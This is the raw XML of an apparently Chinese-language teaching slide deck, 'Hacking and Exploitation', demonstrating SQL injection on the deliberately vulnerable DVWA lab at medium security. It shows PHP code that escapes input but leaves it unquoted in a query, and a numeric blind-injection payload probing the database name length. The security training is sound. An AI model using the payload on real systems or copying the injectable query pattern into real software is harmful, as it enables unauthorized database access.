              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>is_object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"])) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"],  $id ) : ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>trigger_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>("[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>MySQLConverterToo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>] Fix the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysql_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>() call! This code does not work.", E_USER_ERROR)) ? "" : ""));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FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Check database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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = $id;"; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"],  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ); // Removed 'or die' to suppress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> errors 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?&gt;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23505" y="3857980"/>
            <a:ext cx="573637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語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>connection,escapestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>轉義在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語句中使用的字串中的特殊字元。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19523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743"/>
            <a:ext cx="9144000" cy="48725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71989" y="5318975"/>
            <a:ext cx="1815921" cy="206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424412" y="4235003"/>
            <a:ext cx="1637764" cy="195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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="116379" y="1507864"/>
            <a:ext cx="3116687" cy="48725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14" y="2798605"/>
            <a:ext cx="4048125" cy="1924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117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5400" dirty="0" smtClean="0"/>
              <a:t>DEMO:: SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p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219481" y="655935"/>
            <a:ext cx="292451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DVWA_1.10_medium</a:t>
            </a:r>
            <a:endPara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8471" y="4237150"/>
            <a:ext cx="1649574" cy="141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97002" y="3013141"/>
            <a:ext cx="2614411" cy="167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410276" y="3309869"/>
            <a:ext cx="708338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069161" y="5006525"/>
            <a:ext cx="1348458" cy="37849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value="1"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3950136" y="6047378"/>
            <a:ext cx="4410973" cy="333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smtClean="0"/>
              <a:t>value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 and length(database())=4 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"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5545253" y="5475018"/>
            <a:ext cx="396275" cy="492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309870" y="1762761"/>
            <a:ext cx="569150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因程式使用mysqli_real_escape_string函數過濾特殊字元</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>故使用數字型注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>過特殊字元</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20119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714</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小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Hacking and Exploitation_1</dc:title>
  <dc:creator>Win7</dc:creator>
  <cp:lastModifiedBy>ksu</cp:lastModifiedBy>
  <cp:revision>275</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-06T09:03:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-14T19:07:32Z</dcterms:modified>
</cp:coreProperties>
</file>